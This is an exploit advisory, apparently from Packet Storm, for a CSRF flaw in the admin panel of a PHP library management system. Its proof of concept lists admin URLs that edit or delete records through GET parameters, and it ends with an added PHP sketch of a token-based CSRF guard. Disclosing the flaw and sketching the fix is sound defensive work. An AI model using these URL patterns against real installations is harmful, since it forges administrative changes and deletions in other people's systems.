## https://sploitus.com/exploit?id=PACKETSTORM:163141
# Exploit Title: Online Library Management System  
# Date: 15/06/2021  
# Exploit Author : Mohit Dabas  
# Vendor Homepage : https://phpgurukul.com  
# Software Link : https://phpgurukul.com/online-library-management-system/  
# Version: 2.0  
# Tested on : LAMPP  
  
# Description #  
  
Online Library Management System is vulnerable to CSRF in the admin panel. The CSRF exists wherever the admin has an update or delete option.  
The following are example URLs:  
  
# Proof of Concept (PoC) : Exploit #  
  
http://127.0.0.1:8080/library/admin/reg-students.php?id=12  
http://127.0.0.1:8080/library/admin/edit-category.php?catid=4  
http://127.0.0.1:8080/library/admin/manage-categories.php?del=4  
http://127.0.0.1:8080/library/admin/update-issue-bookdeails.php?rid=6
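
A mitigation sketch for the update and delete actions listed above, added here as an example and not taken from the application or the original advisory. The function names and the `csrf_token` field are hypothetical; a plain array stands in for `$_SESSION` so the constructed sample requests run from the PHP CLI.

```php
<?php
// Added example: CSRF guard for state-changing admin actions.
// csrf_issue_token(), csrf_request_allowed() and the 'csrf_token' field
// are hypothetical names, not part of the application.

// Create (once per session) the token that every admin form must embed
// in a hidden field.
function csrf_issue_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Decide whether an update/delete request may proceed.
function csrf_request_allowed(string $method, array $post, array $session): bool
{
    // State changes must not ride on GET: links, images and redirects
    // all issue GET requests with the admin's session cookie attached.
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    if ($expected === '' || !is_string($supplied)) {
        return false;
    }
    // Constant-time comparison against the per-session token.
    return hash_equals($expected, $supplied);
}

// Constructed sample requests (not captured traffic).
$session = [];
$token   = csrf_issue_token($session);
$cases   = [
    'GET with del=4 in the query string' => ['GET',  []],
    'POST without a token'               => ['POST', ['del' => '4']],
    'POST with a wrong token'            => ['POST', ['del' => '4', 'csrf_token' => str_repeat('0', 64)]],
    'POST with the session token'        => ['POST', ['del' => '4', 'csrf_token' => $token]],
];
foreach ($cases as $label => [$method, $post]) {
    $verdict = csrf_request_allowed($method, $post, $session) ? 'allowed' : 'rejected';
    printf("%-36s %s\n", $label, $verdict);
}
```

In a deployment the same check would run at the top of each admin handler before any update or delete, and setting the session cookie's SameSite attribute adds a second layer.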